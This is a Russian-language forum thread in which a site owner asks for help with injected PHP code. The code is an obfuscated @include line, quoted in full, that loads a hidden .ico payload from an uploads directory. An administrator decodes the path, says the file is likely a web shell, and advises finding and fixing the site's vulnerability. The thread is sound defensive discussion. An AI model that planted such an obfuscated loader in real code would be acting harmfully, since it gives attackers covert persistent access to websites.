• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Проблема с вредоносным кодом PHP, который сам встраивается

15.08.2022
2
0
BIT
0
Всем доброго времени суток. Прошу знающих подсказать, как бороться с данной патологией ибо Я сам очень далек от ИБ.
Дело в том, что в один момент, полгода назад на сервере появились подозрительные файлы расширения .php и .ico.
Файлы php имели названия из набора латинских букв. Но самое неудобное, что во все индексы встраивается вот этот код:
PHP:
/*51ceb*/

@include "\057var\057www\057kir\151ll/\144ot.\155edk\162mu/\146las\153/up\154oad\163/96\06141/\0568f0\06373d\067.ic\157";

/*51ceb*/
imagee_2022-08-15_15-18-49.png


Вот сами файлы.

Подскажитее как решить проблему, пожалуйста.
 
15.08.2022
2
0
BIT
0

larchik

Администратор
07.06.2019
401
476
BIT
418
Всем доброго времени суток. Прошу знающих подсказать, как бороться с данной патологией ибо Я сам очень далек от ИБ.
Дело в том, что в один момент, полгода назад на сервере появились подозрительные файлы расширения .php и .ico.
Файлы php имели названия из набора латинских букв. Но самое неудобное, что во все индексы встраивается вот этот код:
PHP:
/*51ceb*/

@include "\057var\057www\057kir\151ll/\144ot.\155edk\162mu/\146las\153/up\154oad\163/96\06141/\0568f0\06373d\067.ic\157";

/*51ceb*/
Посмотреть вложение 62392

Вот сами файлы.

Подскажитее как решить проблему, пожалуйста.
Привет. Похоже на то, что встраиваемый код включает какой-то файл по пути /var/www/kiril/.../flask/uploads/96141/.8f0373d7.ico
Вероятно этот самый файл - полезная нагрузка (вебшелл или еще что-то). Это говорит о том, что сервер уязвим (скорее всего сам сайт). Следовательно, чтобы решить проблему, надо найти уязвимость и устранить ее.

если бы у нас был бюджет то обратились бы)
Поэтому бюджет нужен.

Ты не одинок, тут по тексту описана эта проблема:
Направление, в какую сторону копать, у тебя есть.
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!